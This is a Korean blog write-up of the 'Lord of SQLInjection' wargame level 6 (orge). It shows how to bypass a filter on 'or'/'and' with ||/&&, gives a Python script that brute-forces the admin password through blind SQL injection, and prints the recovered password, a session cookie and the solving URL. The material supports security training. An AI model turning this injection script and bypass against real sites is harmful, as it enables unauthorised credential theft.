[LOS] Level6: orge

두비니

·

2020. 1. 4. 16:26

 

Lord OSQLInjection: lv.6 orge

 

 

 

 

orge입니다.

 

 

or 또는 and를 사용하면 안되네요.

 

or과 and는 각각 ||와 &&를 이용하면 우회 가능합니다.

 

 

 

 

 

Hello admin까지는 출력하였고, 이 스테이지를 해결하는 조건이 pw를 알아내야 하므로 이는 python코드로 알아냅시다.

 

 

import httplib

headers = {'Content-Type':'application/x-www-form-urlencoded', 'Cookie':'PHPSESSID=ti3sc786arte8880jt3bjk2kt3'}
conn = httplib.HTTPSConnection('los.rubiya.kr', 443)
pw=''
for i in range(10):
    for j in range(32, 128):
        conn.request('GET', '/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%26%26%20ascii(substr(pw,'+str(i)+',1))='+str(j)+'%23','',headers)
        r1 = conn.getresponse().read()
        if 'Hello admin' in r1:
            pw += chr(j)
            print pw
            break

 

 

주의해야할 점은 &&은 %26으로 입력하지 않으면 오류가 발생하더라구요. 그래서 주의해주시면 좋을것같습니당

 

 

 

비밀번호가 잘 얻어졌고, 이제 문제를 풉시다

 

 

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec

 

 

 

'War Games > Lord of SQLInjection' 카테고리의 다른 글

[LOS] Level7: troll  (0) 2020.01.05
[LOS] cheat sheet(이스터에그)  (0) 2020.01.04
[LOS] Level5: wolfman  (0) 2020.01.03
[LOS] Level4: orc  (0) 2020.01.01
[LOS] Level3: goblin  (0) 2019.12.31